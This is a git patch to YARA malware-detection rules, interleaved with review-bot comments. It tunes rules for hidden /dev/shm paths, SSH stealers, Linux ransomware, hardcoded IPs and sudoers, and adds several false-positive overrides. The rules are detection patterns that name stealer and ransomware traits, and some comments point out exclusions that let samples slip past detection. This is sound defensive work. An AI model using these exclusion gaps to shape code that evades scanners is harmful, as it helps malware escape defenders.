From 8e1f8372c1d57b7e7cca17f660ab248620700e2f Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Thomas=20Str=C3=B6mberg?= Date: Thu, 7 Nov 2024 10:56:02 -0500 Subject: [PATCH] Rule tuning to decrease false-positives on Fedora (#598) * Reduce Fedora false-positives * Reduce Fedora false-positives * update tests * update testdata * split the dev_* rules --- rules/c2/addr/ip.yara | 44 +++++---- rules/c2/addr/url-unusual.yara | 1 + rules/discover/ip/public_ip.yara | 11 +++ .../chdir-unusual.yara | 0 rules/evasion/covert-location/dev-mqueue.yara | 11 +++ .../dev-shm.yara | 16 +-- .../{dev-mqueue.yara => dev_mqueue.yara} | 11 --- rules/evasion/hidden_paths/dev_shm.yara | 14 +++ rules/evasion/hidden_paths/x11.yara | 13 +++ .../etc-ld.so.preload.yara | 0 rules/exec/shell/busybox-exec.yara | 10 +- rules/exfil/stealer/ssh.yara | 10 +- rules/false_positives/flatpak.yara | 11 +++ rules/false_positives/virtualbox.yara | 11 +++ .../permission-modify-dangerous.yara | 1 + rules/fs/proc/pid-exe.yara | 11 +++ rules/hw/dev/mem.yara | 4 +- rules/impact/cryptojacking/generic.yara | 1 - rules/impact/degrade/linux_paths.yara | 13 +-- rules/impact/ransom/linux.yara | 11 ++- rules/privesc/sudoers.yara | 11 +++ .../lottie-player.min.js.mdiff | 3 +- tests/javascript/clean/connection.js.simple | 1 + tests/linux/2021.FontOnLake/45E9.elf.simple | 1 + .../2022.Symbiote/kerneldev.so.bkp.simple | 1 + tests/linux/2023.Kinsing/install.sh.simple | 5 +- .../wyoming-xray-undress-robert.simple | 10 ++ tests/linux/2024.Darkcracks/darkcracks.sh.md | 2 +- .../eight-nebraska-autumn-illinois.simple | 3 +- .../uranus-ack-mike-cat.simple | 74 ++++++++++++++ .../2024.hadooken/crondr_as_bash.sh.simple | 2 +- tests/linux/2024.hadooken/ssh_worm.sh.simple | 1 + .../linux/2024.k4spreader/degrader.sh.simple | 2 +- tests/linux/2024.k4spreader/knlib.simple | 2 +- .../emp3r0r.agent.simple | 3 +- .../2024.kworker_pretenders/gafgyt.simple | 3 +- tests/linux/2024.medusa/rkload.simple | 4 +- tests/linux/2024.miner_dropper/drop.sh.simple | 2 +- ...5d0e2031551f9f1a70b6db475ba71b2.elf.simple | 3 +- 
tests/linux/clean/appsec-rules.json.simple | 1 - tests/linux/clean/chrome.simple | 2 +- tests/linux/clean/clickhouse.simple | 2 +- tests/linux/clean/containerd.simple | 5 +- tests/linux/clean/default_config.json.simple | 1 - tests/linux/clean/ld-2.27.so.simple | 2 +- tests/linux/clean/nvim.simple | 2 +- tests/linux/clean/pandoc.md | 1 - tests/linux/clean/redis-server.aarch64.md | 99 +++++++++---------- tests/linux/clean/rules.json.simple | 1 - tests/linux/clean/searchindex.json.simple | 2 +- .../clean/securitySolution.chunk.9.js.simple | 1 - tests/linux/clean/slack.md | 2 +- tests/linux/clean/slirp4netns.simple | 2 +- .../clean/sonarlint-metadata.json.simple | 3 +- tests/linux/clean/sudo.simple | 1 + tests/linux/clean/trivy.simple | 4 +- .../wikiticker-2015-09-12-sampled.json.simple | 1 - tests/linux/clean/wolfictl.simple | 2 +- tests/macOS/2024.Rustdoor/localfile.simple | 2 +- .../2024.distube-fast/postinstall.js.simple | 1 + .../2024.next-react-notify/tocall.js.simple | 1 + .../2024.persona-tool/preinstall.js.simple | 1 + tests/php/clean/composer-2.7.7.simple | 1 + .../clean/setuptools/build_meta.py.simple | 1 - 64 files changed, 320 insertions(+), 158 deletions(-) rename rules/evasion/{hidden_paths => covert-location}/chdir-unusual.yara (100%) create mode 100644 rules/evasion/covert-location/dev-mqueue.yara rename rules/evasion/{hidden_paths => covert-location}/dev-shm.yara (72%) rename rules/evasion/hidden_paths/{dev-mqueue.yara => dev_mqueue.yara} (50%) create mode 100644 rules/evasion/hidden_paths/dev_shm.yara rename rules/evasion/{hidden_paths => hijack_execution}/etc-ld.so.preload.yara (100%) create mode 100644 rules/false_positives/flatpak.yara create mode 100644 rules/false_positives/virtualbox.yara create mode 100644 tests/linux/2024.Beast/wyoming-xray-undress-robert.simple create mode 100644 tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple diff --git a/rules/c2/addr/ip.yara b/rules/c2/addr/ip.yara index 8561cfbef..9d24d9b9d 100644 
--- a/rules/c2/addr/ip.yara
+++ b/rules/c2/addr/ip.yara
@@ -6,38 +6,40 @@ rule hardcoded_ip: medium { hash_2023_Downloads_311c = "311c93575efd4eeeb9c6674d0ab8de263b72a8fb060d04450daccc78ec095151" strings: - $ipv4 = /([1-9][0-9]{1,2}\.){3}[1-9][0-9]{1,2}/ fullword - $not_localhost = "127.0.0.1" - $not_broadcast = "255.255.255.255" - $not_upnp = "239.255.255.250" - $not_weirdo = "635.100.12.38" - $not_incr = "10.11.12.13" - $not_169 = "169.254.169.254" - $not_spyder = "/search/spider" - $not_ruby = "210.251.121.214" + // strict: excludes 255.* and *.0.* *.1.* + $sus_ipv4 = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])/ fullword + $not_version = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])[\.\-]/ + $not_incr = "10.11.12.13" + $not_169 = "169.254.169.254" + $not_spyder = "/search/spider" + $not_ruby = "210.251.121.214" + $not_1_2_3_4 = "1.2.3.4" + $not_root_servers_h = "128.63.2.53" + $not_root_servers_i = "192.36.148.17" condition: - 1 of ($ip*) and none of ($not*) + filesize < 200MB and 1 of ($sus_ip*) and none of ($not*) } rule elf_hardcoded_ip: high { meta: - description = "hardcoded IP address" + description = "ELF with hardcoded IP address" hash_2023_Downloads_016a = "016a1a4fe3e9d57ab0b2a11e37ad94cc922290d2499b8d96957c3ddbdc516d74" hash_2024_Downloads_0fa8 = "503fcf8b03f89483c0335c2a7637670c8dea59e21c209ab8e12a6c74f70c7f38" hash_2023_Downloads_311c = "311c93575efd4eeeb9c6674d0ab8de263b72a8fb060d04450daccc78ec095151" strings: - $ipv4 = /([1-9][0-9]{1,2}\.){3}[1-9][0-9]{1,2}/ fullword - $not_localhost = "127.0.0.1" - $not_broadcast = "255.255.255.255" - $not_upnp = "239.255.255.250" - $not_weirdo = "635.100.12.38" - $not_incr = "10.11.12.13" - $not_169 = "169.254.169.254" - $not_spyder = "/search/spider" - $not_ruby = "210.251.121.214" + // stricter version of what's above: excludes 255.* and *.0.* *.1.* + $sus_ipv4 = 
/((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])/ fullword + $not_version = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])[\.\-]/ + $not_incr = "10.11.12.13" + $not_169 = "169.254.169.254" + $not_spyder = "/search/spider" + $not_ruby = "210.251.121.214" + $not_1_2_3_4 = "1.2.3.4" + $not_root_servers_h = "128.63.2.53" + $not_root_servers_i = "192.36.148.17" condition: - filesize < 4MB and uint32(0) == 1179403647 and 1 of ($ip*) and none of ($not*) + filesize < 12MB and uint32(0) == 1179403647 and 1 of ($sus_ip*) and none of ($not*) } diff --git a/rules/c2/addr/url-unusual.yara b/rules/c2/addr/url-unusual.yara index 32e1e61f9..07db39c8d 100644 --- a/rules/c2/addr/url-unusual.yara +++ b/rules/c2/addr/url-unusual.yara @@ -19,6 +19,7 @@ rule exotic_tld: high { $not_nips = "nips.cc" $not_gov_bd = ".gov.bd" $not_eol = "endoflife.date" + $not_whois = "bdia.btcl.com.bd" condition: filesize < 10MB and any of ($http*) and none of ($not_*) diff --git a/rules/discover/ip/public_ip.yara b/rules/discover/ip/public_ip.yara index 945dc248b..602e11b79 100644 --- a/rules/discover/ip/public_ip.yara +++ b/rules/discover/ip/public_ip.yara @@ -20,6 +20,17 @@ rule iplookup_website: high { $ipinfo = "ipinfo.io" $check_ip = "checkip.amazonaws.com" + condition: + filesize < 250MB and any of them +} + +rule v6_ipinfo_website: override { + meta: + iplookup_website = "medium" + + strings: + $v6 = "v6.ipinfo.io" + condition: any of them } diff --git a/rules/evasion/hidden_paths/chdir-unusual.yara b/rules/evasion/covert-location/chdir-unusual.yara similarity index 100% rename from rules/evasion/hidden_paths/chdir-unusual.yara rename to rules/evasion/covert-location/chdir-unusual.yara diff --git a/rules/evasion/covert-location/dev-mqueue.yara b/rules/evasion/covert-location/dev-mqueue.yara new file mode 100644 index 000000000..455bed404 --- /dev/null 
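Review bot: The `// stricter version of what's above` comment on `elf_hardcoded_ip` is inaccurate — its `$sus_ipv4`, `$not_version` and `$not_*` strings are byte-for-byte the same as in `hardcoded_ip`; the only differences are the ELF magic check and the 12MB cap. Rather than carry a duplicated string set that will drift, the second rule can reference the first: `filesize < 12MB and uint32(0) == 1179403647 and hardcoded_ip`. Separately, in both rules `none of ($not*)` is evaluated file-wide, so one `$not_version` hit (any dotted quad followed by `.` or `-`, such as a version string) suppresses every other address in a file up to 200MB; if that is not intended, the version check can be tied to each IP's own offset with `for any i in (1..#sus_ipv4) : (not $not_version at @sus_ipv4[i])`, keeping the literal `$not_*` strings as file-wide exclusions.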
+++ b/rules/evasion/covert-location/dev-mqueue.yara @@ -0,0 +1,11 @@ +rule dev_mqueue: medium { + meta: + description = "path reference within /dev/mqueue (world writeable)" + + strings: + $mqueue = /\/dev\/mqueue[%\w\.\-\/]{0,64}/ + + condition: + any of them +} + diff --git a/rules/evasion/hidden_paths/dev-shm.yara b/rules/evasion/covert-location/dev-shm.yara similarity index 72% rename from rules/evasion/hidden_paths/dev-shm.yara rename to rules/evasion/covert-location/dev-shm.yara index 13484383c..57b17be10 100644 --- a/rules/evasion/hidden_paths/dev-shm.yara +++ b/rules/evasion/covert-location/dev-shm.yara @@ -33,6 +33,8 @@ rule dev_shm_file: high linux { $not_shmem = "shmem" fullword $not_shm_pages = "shm_pages" $not_wasm = "FS.mkdir(\"/dev/shm/tmp\")" + $not_auxfs = "/dev/shm/aufs" + $not_journal = "/dev/shm/journal" condition: $ref and none of ($not*) and not dev_shm_mkstemp @@ -52,17 +54,3 @@ rule dev_shm_sh: critical linux { any of them } -rule dev_shm_hidden: critical linux { - meta: - description = "path reference within /dev/shm (world writeable)" - hash_2023_OK_ad69 = "ad69e198905a8d4a4e5c31ca8a3298a0a5d761740a5392d2abb5d6d2e966822f" - hash_2023_OrBit_f161 = "f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8" - hash_2023_Unix_Downloader_Rocke_228e = "228ec858509a928b21e88d582cb5cfaabc03f72d30f2179ef6fb232b6abdce97" - - strings: - $dev_shm = /\/dev\/shm\/\.[\%\w\.\-\/]{0,64}/ - $ignore_mkstemp = /\/dev\/shm\/[%\w\.\-\/]{0,64}X{6}/ - - condition: - $dev_shm and not $ignore_mkstemp -} diff --git a/rules/evasion/hidden_paths/dev-mqueue.yara b/rules/evasion/hidden_paths/dev_mqueue.yara similarity index 50% rename from rules/evasion/hidden_paths/dev-mqueue.yara rename to rules/evasion/hidden_paths/dev_mqueue.yara index 1a255c78f..584e9587f 100644 --- a/rules/evasion/hidden_paths/dev-mqueue.yara +++ b/rules/evasion/hidden_paths/dev_mqueue.yara 
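Review bot: The new `dev_mqueue` rule has no `filesize` bound, while the other rules touched in this commit (`hardcoded_ip`, `dev_mem`, the `X11` and `flatpak` overrides) gain or carry one, so its regex runs over inputs of any size; `filesize < 10MB and any of them` would bring it in line, with whatever cap the sibling rules use. The regex `/\/dev\/mqueue[%\w\.\-\/]{0,64}/` also accepts the bare mount point `/dev/mqueue` with no path component, which presumably appears in mount helpers and fstab-style data; if the intent is a file inside the queue directory, requiring the slash (`\/dev\/mqueue\/`) narrows it — hedged, since the covering tests are not in this chunk.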
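Review bot: `$not_auxfs = "/dev/shm/aufs"` — the identifier says auxfs while the literal is the aufs union filesystem; `$not_aufs` reads correctly. Both new exclusions act file-wide through `none of ($not*)` in a `high` rule, so a binary that mentions `/dev/shm/journal` or `/dev/shm/aufs` anywhere no longer trips `dev_shm_file` whatever other `/dev/shm` paths it references; a short trailing comment naming the benign producer each literal was taken from would let a later maintainer judge whether the exclusion is still warranted. The rule's `$ref` string and header are above the hunk.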
@@ -1,14 +1,3 @@ -rule dev_mqueue: medium { - meta: - description = "path reference within /dev/mqueue (world writeable)" - - strings: - $mqueue = /\/dev\/mqueue[%\w\.\-\/]{0,64}/ - - condition: - any of them -} - rule dev_mqueue_hidden: high { meta: description = "path reference within /dev/mqueue (world writeable)" diff --git a/rules/evasion/hidden_paths/dev_shm.yara b/rules/evasion/hidden_paths/dev_shm.yara new file mode 100644 index 000000000..85ad99723 --- /dev/null +++ b/rules/evasion/hidden_paths/dev_shm.yara @@ -0,0 +1,14 @@ +rule dev_shm_hidden: critical linux { + meta: + description = "hidden path reference within /dev/shm (world writeable)" + hash_2023_OK_ad69 = "ad69e198905a8d4a4e5c31ca8a3298a0a5d761740a5392d2abb5d6d2e966822f" + hash_2023_OrBit_f161 = "f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8" + hash_2023_Unix_Downloader_Rocke_228e = "228ec858509a928b21e88d582cb5cfaabc03f72d30f2179ef6fb232b6abdce97" + + strings: + $dev_shm = /\/dev\/shm\/\.[\%\w\.\-\/]{0,64}/ + $ignore_mkstemp = /\/dev\/shm\/[%\w\.\-\/]{0,64}X{6}/ + + condition: + $dev_shm and not $ignore_mkstemp +} diff --git a/rules/evasion/hidden_paths/x11.yara b/rules/evasion/hidden_paths/x11.yara index 333446692..79f7b67b0 100644 --- a/rules/evasion/hidden_paths/x11.yara +++ b/rules/evasion/hidden_paths/x11.yara @@ -9,3 +9,16 @@ rule hidden_x11: high linux { condition: filesize < 10MB and all of them } + +rule X11: override { + meta: + hidden_x11 = "low" + + strings: + $usr_share = "/usr/share/X11" + $X11Gray = "X11Gray" + $X11_space = "/etc/X11/" + + condition: + filesize < 10MB and any of them +} diff --git a/rules/evasion/hidden_paths/etc-ld.so.preload.yara b/rules/evasion/hijack_execution/etc-ld.so.preload.yara similarity index 100% rename from rules/evasion/hidden_paths/etc-ld.so.preload.yara rename to rules/evasion/hijack_execution/etc-ld.so.preload.yara 
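Review bot: The override rule is named `X11`, while every other override in this commit uses a lowercase descriptive name (`flatpak`, `virtualbox_override`, `legit_proc_exec`, `sudo_parser`, `v6_ipinfo_website`); `rule x11_override: override {` keeps the naming consistent. `$X11_space = "/etc/X11/"` contains no space, so the identifier is misleading — `$etc_x11` describes it. This override also lacks the `description` meta that `flatpak` and `virtualbox_override` carry.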
diff --git a/rules/exec/shell/busybox-exec.yara b/rules/exec/shell/busybox-exec.yara index 363a3e1a2..2c02b5432 100644 --- a/rules/exec/shell/busybox-exec.yara +++ b/rules/exec/shell/busybox-exec.yara @@ -1,8 +1,6 @@ rule busybox_runner: medium linux { meta: - hash_2023_Unix_Dropper_Mirai_0e91 = "0e91c06bb84630aba38e9c575576b46240aba40f36e6142c713c9d63a11ab4bb" - hash_2023_Unix_Dropper_Mirai_4d50 = "4d50bee796cda760b949bb8918881b517f4af932406307014eaf77d8a9a342d0" - hash_2023_Unix_Dropper_Mirai_56ca = "56ca15bdedf9751f282b24d868b426b76d3cbd7aecff5655b60449ef0d2ca5c8" + description = "runs busybox programs" strings: $ref = /\/bin\/busybox \w{2,16}[ \/\w\.]{0,64}/ @@ -13,12 +11,10 @@ rule busybox_runner: medium linux { rule busybox_runner_high: high linux { meta: - hash_2023_Unix_Dropper_Mirai_0e91 = "0e91c06bb84630aba38e9c575576b46240aba40f36e6142c713c9d63a11ab4bb" - hash_2023_Unix_Dropper_Mirai_4d50 = "4d50bee796cda760b949bb8918881b517f4af932406307014eaf77d8a9a342d0" - hash_2023_Unix_Dropper_Mirai_56ca = "56ca15bdedf9751f282b24d868b426b76d3cbd7aecff5655b60449ef0d2ca5c8" + description = "small program that runs atypical busybox programs" strings: - $ref = /\/bin\/busybox \w{2,16}[ \/\w\.]{0,64}/ + $ref = /\/bin\/busybox \w{4,16}[ \/\w\.]{0,64}/ $not_cgroup = "cgroup" fullword $not_container = "container" fullword $not_ixr = "busybox ixr" diff --git a/rules/exfil/stealer/ssh.yara b/rules/exfil/stealer/ssh.yara index 175131b92..008799cce 100644 --- a/rules/exfil/stealer/ssh.yara +++ b/rules/exfil/stealer/ssh.yara @@ -1,6 +1,6 @@ -rule tar_ssh_net: high { +rule tar_ssh_net: medium { meta: - description = "possible SSH stealer" + description = "possible tar-based SSH stealer" hash_2023_Downloads_6e35 = "6e35b5670953b6ab15e3eb062b8a594d58936dd93ca382bbb3ebdbf076a1f83b" hash_2023_Qubitstrike_branch_raw_mi = "9a5f6318a395600637bd98e83d2aea787353207ed7792ec9911b775b79443dcd" hash_2023_Qubitstrike_mi = "9a5f6318a395600637bd98e83d2aea787353207ed7792ec9911b775b79443dcd" 
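Review bot: Raising the applet quantifier to `\w{4,16}` in `busybox_runner_high` silently drops every two- and three-letter applet from the high-severity rule while `busybox_runner` just above still matches them with `\w{2,16}`; nothing in the hunk says why, and the two descriptions (`runs busybox programs` vs `small program that runs atypical busybox programs`) do not explain the difference either. A one-line comment on the regex, e.g. `// 4+ char applets only; short applet names are too common in init scripts for a high-severity hit — the medium rule above still covers them`, would record the intent (wording hedged, since the motivating false positive is not in this chunk). The three Mirai sample hashes are removed from `meta` in both rules; if those samples still match, keeping the hashes documents what the rules were written for.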
@@ -14,13 +14,15 @@ rule tar_ssh_net: high { $z_tar = "tar" fullword $z_xargs = "xargs cat" + $not_auth_keys = ".ssh/authorized_keys" + condition: - filesize < 10MB and $h and any of ($s*) and any of ($z*) + filesize < 10MB and $h and any of ($s*) and any of ($z*) and none of ($not*) } rule curl_https_ssh: high { meta: - description = "possible SSH stealer" + description = "possible curl-based SSH stealer" strings: $curl = "curl" fullword diff --git a/rules/false_positives/flatpak.yara b/rules/false_positives/flatpak.yara new file mode 100644 index 000000000..fa0303f1a --- /dev/null +++ b/rules/false_positives/flatpak.yara @@ -0,0 +1,11 @@ +rule flatpak: override { + meta: + description = "flatpak" + lvt_locker = "medium" + + strings: + $flatpak = "FLATPAK_BINARY" fullword + + condition: + filesize < 3MB and any of them +} diff --git a/rules/false_positives/virtualbox.yara b/rules/false_positives/virtualbox.yara new file mode 100644 index 000000000..e3e951aa4 --- /dev/null +++ b/rules/false_positives/virtualbox.yara @@ -0,0 +1,11 @@ +rule virtualbox_override: override { + meta: + description = "VirtualBox" + backdoor_caps = "low" + + strings: + $ref = "GROUP_DEV_VMM_BACKDOOR" + + condition: + filesize < 1MB and any of them +} diff --git a/rules/fs/permission/permission-modify-dangerous.yara b/rules/fs/permission/permission-modify-dangerous.yara index 366464b63..8af721630 100644 --- a/rules/fs/permission/permission-modify-dangerous.yara +++ b/rules/fs/permission/permission-modify-dangerous.yara @@ -21,6 +21,7 @@ rule chmod_dangerous_exec: high exfil { $not_chmod_1777 = "chmod 1777" $not_chmod_01777 = "chmod 01777" $not_chromium = "CHROMIUM_TIMESTAMP" + $not_var_tmp = "chmod 0777 /var/tmp" fullword condition: filesize < 50MB and $ref and none of ($not*) diff --git a/rules/fs/proc/pid-exe.yara b/rules/fs/proc/pid-exe.yara index e0d8ead6c..44496b6ce 100644 --- a/rules/fs/proc/pid-exe.yara +++ b/rules/fs/proc/pid-exe.yara 
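Review bot: `$not_auth_keys = ".ssh/authorized_keys"` is a file-wide exclusion on a rule whose purpose is SSH credential theft, and scripts that bundle `~/.ssh` commonly also reference `authorized_keys` for their own persistence, so the exclusion is likely to remove true positives together with the Fedora false positive. Encoding the specific benign pattern that was hit — a longer literal including the surrounding command from the clean sample, rather than the bare path — would exclude less. The rule's `$h` and `$s*` strings are defined above the hunk.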
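Review bot: `fullword` on `$not_var_tmp = "chmod 0777 /var/tmp"` only requires a non-alphanumeric character after `tmp`, so `chmod 0777 /var/tmp/<anything>` also satisfies the exclusion and, via `none of ($not*)`, silences the whole `high` rule for that file. If the intent is to exempt only the directory itself, `$not_var_tmp = /chmod 0777 \/var\/tmp[\s;&|]/` (or two literals ending in a space and a newline) does that — hedged, since `$ref` is defined above the hunk.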
@@ -13,3 +13,14 @@ rule proc_exe: high { condition: any of them } + +rule legit_proc_exec: override { + meta: + proc_exe = "medium" + + strings: + $string = "Fastfetch" fullword + + condition: + filesize < 3MB and any of them +} diff --git a/rules/hw/dev/mem.yara b/rules/hw/dev/mem.yara index c190c26cf..86792b325 100644 --- a/rules/hw/dev/mem.yara +++ b/rules/hw/dev/mem.yara @@ -1,4 +1,4 @@ -rule dev_mem: high linux { +rule dev_mem: medium linux { meta: capability = "CAP_SYS_RAWIO" description = "access raw system memory" @@ -13,7 +13,7 @@ rule dev_mem: high linux { $not_no = "no /dev/mem" fullword condition: - uint32(0) == 1179403647 and $val and none of ($not*) + filesize < 10MB and uint32(0) == 1179403647 and $val and none of ($not*) } rule comsvcs_minidump: high windows { diff --git a/rules/impact/cryptojacking/generic.yara b/rules/impact/cryptojacking/generic.yara index 588869409..3f3b1f28e 100644 --- a/rules/impact/cryptojacking/generic.yara +++ b/rules/impact/cryptojacking/generic.yara @@ -27,7 +27,6 @@ rule danger_crypto_miner: high { $miner_url = "miner_url" $cryptonight = "Cryptonight" $minergate = "minergate" - $_miner_ = "_miner_" condition: filesize < 10485760 and 1 of them diff --git a/rules/impact/degrade/linux_paths.yara b/rules/impact/degrade/linux_paths.yara index 753ce517e..1b7651e6b 100644 --- a/rules/impact/degrade/linux_paths.yara +++ b/rules/impact/degrade/linux_paths.yara @@ -22,7 +22,7 @@ rule linux_critical_system_paths: medium { $proc_self_cgroup = "/proc/self/cgroup" $p_lib = "/usr/lib/x86_64-linux-gnu/" $p_lib_ld = "/lib64/ld-linux-x86-64.so.2" - $p_sys = /\/sys\/(devices|class)[\w\/\.\-]{0,32}/ + $p_dev_sys = /\/sys\/devices\/system\/(cpu|node)\/[\w\/\.\-]{0,32}/ $p_sysctl = /sysctl[ -a-z]{0,32}/ $p_dev_watchdog = "/dev/watchdog" $p_ps = "/usr/bin/ps" 
@@ -31,7 +31,7 @@ rule linux_critical_system_paths: medium { $p_dev_shm = "/dev/shm" condition: - filesize < 120MB and any of ($p_etc*) and 5 of ($p*) + filesize < 120MB and any of ($p_etc*) and 40 % of ($p*) } rule linux_critical_system_paths_small_elf: high { @@ -49,7 +49,7 @@ rule linux_critical_system_paths_small_elf: high { $p_etc_selinux = /\/etc\/selinux[\w\/\.\-]{0,32}/ $p_etc_systemd = /\/etc\/systemd[\w\/\.\-]{0,32}/ $p_etc_preload = "/etc/ld.so.preload" - $p_ld_so_cache = "/etc/ld.so.cache" + $p_etc_ld_so_cache = "/etc/ld.so.cache" $p_var_run = /\/var\/run[\w\/\.\-]{0,32}/ $p_var_log = /\/var\/log[\w\/\.\-]{0,32}/ $p_usr_libexec = /\/usr\/libexec[\w\/\.\-]{0,32}/ @@ -61,7 +61,7 @@ rule linux_critical_system_paths_small_elf: high { $proc_self_cgroup = "/proc/self/cgroup" $p_lib = "/usr/lib/x86_64-linux-gnu/" $p_lib_ld = "/lib64/ld-linux-x86-64.so.2" - $p_sys = /\/sys\/(devices|class)[\w\/\.\-]{0,32}/ + $p_dev_sys = /\/sys\/devices\/system\/(cpu|node)\/[\w\/\.\-]{0,32}/ $p_sysctl = /sysctl[ -a-z]{0,32}/ $p_dev_watchdog = "/dev/watchdog" $p_ps = "/usr/bin/ps" @@ -71,9 +71,10 @@ rule linux_critical_system_paths_small_elf: high { $not_vim = "VIMRUNTIME" fullword $not_systemd = "SYSTEMD_OS_RELEASE" + $not_vio = "/sys/devices/vio" condition: - filesize < 10MB and uint32(0) == 1179403647 and any of ($p_etc*) and 5 of ($p*) and none of ($not*) + filesize < 2MB and uint32(0) == 1179403647 and any of ($p_etc*) and 40 % of ($p*) and none of ($not*) } rule linux_critical_system_paths_small_shell: high { @@ -112,5 +113,5 @@ rule linux_critical_system_paths_small_shell: high { $p_dev_shm = "/dev/shm" condition: - filesize < 64KB and $hash_bang in (0..2) and any of ($p_etc*) and 5 of ($p*) + filesize < 64KB and $hash_bang in (0..2) and any of ($p_etc*) and 40 % of ($p*) } diff --git a/rules/impact/ransom/linux.yara b/rules/impact/ransom/linux.yara index cd8e41e87..f8e9caf34 100644 --- a/rules/impact/ransom/linux.yara +++ b/rules/impact/ransom/linux.yara 
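Review bot: Renaming `$p_ld_so_cache` to `$p_etc_ld_so_cache` in `linux_critical_system_paths_small_elf` also moves `/etc/ld.so.cache` into the `any of ($p_etc*)` gate, so a string that presumably appears in most dynamically linked ELF binaries can now satisfy the `/etc` prerequisite on its own; if that is intended it deserves a mention, otherwise the old name should stay. The switch from `5 of ($p*)` to `40 % of ($p*)` in all three rules makes the threshold float with the size of the `$p*` set — and `$proc_self_cgroup` matches the `$p*` glob too — so adding or removing a string shifts the effective count; a comment such as `// 40% of ~N path strings` next to each condition, or giving the counted strings a prefix distinct from the exclusions, would make that visible. The enclosing rules of the second and later hunks begin above them.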
@@ -34,7 +34,6 @@ rule linux_syscalls: high { strings: $e_Encrypt = "ENCRYPT" - $e_crypto = "crypto" $e_encrypt = "encrypt" $e_chacha = "chacha20" $e_Processed = "Processed:" @@ -56,8 +55,16 @@ rule linux_syscalls: high { $f_rename = "rename" fullword $f_atoi = "atoi" fullword + $not_getgid = "getgid" fullword + $not_strtol = "strtol" fullword + $not_dlopen = "dlopen" fullword + $not_setenv = "setenv" fullword + $not_asctime = "asctime" fullword + $not_inet_ntop = "inet_ntop" fullword + $not_getifaddrs = "getifaddrs" fullword + condition: - filesize < 1MB and uint32(0) == 1179403647 and $f_readdir and 85 % of ($f*) and any of ($e*) + filesize < 1MB and uint32(0) == 1179403647 and $f_readdir and 85 % of ($f*) and any of ($e*) and none of ($not*) } rule conti_alike: high posix { diff --git a/rules/privesc/sudoers.yara b/rules/privesc/sudoers.yara index bbf4f5c9f..3426d3afb 100644 --- a/rules/privesc/sudoers.yara +++ b/rules/privesc/sudoers.yara @@ -22,3 +22,14 @@ rule small_elf_sudoer: high { condition: uint32(0) == 1179403647 and filesize < 10MB and sudo_editor } + +rule sudo_parser: override { + meta: + small_elf_sudoer = "medium" + + strings: + $parse = "sudo_parse" + + condition: + uint32(0) == 1179403647 and filesize < 10MB and all of them +} diff --git a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff index 87ee8b60a..0b85abe57 100644 --- a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff +++ b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff 
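Review bot: The seven new `$not_*` symbols in `linux_syscalls` are combined with `none of ($not*)`, so an ELF importing any single one of `strtol`, `setenv`, `dlopen`, `getgid`, `asctime`, `inet_ntop` or `getifaddrs` — all ordinary libc calls a file-walking encryptor can plausibly use — drops out of this `high` rule entirely. That is a far larger carve-out than the Fedora false positives need; a threshold (`not 3 of ($not*)`, number to be tuned against the test corpus) or restricting the list to the symbols the clean samples actually shared would cut less. The rule's `$f_*` strings and the `conti_alike` rule that follows are outside the hunk.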
@@ -1,6 +1,6 @@ ## Changed: javascript/2024.lottie-player/lottie-player.min.js [🟡 MEDIUM → 🛑 CRITICAL] -### 44 new behaviors +### 43 new behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | |-----------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
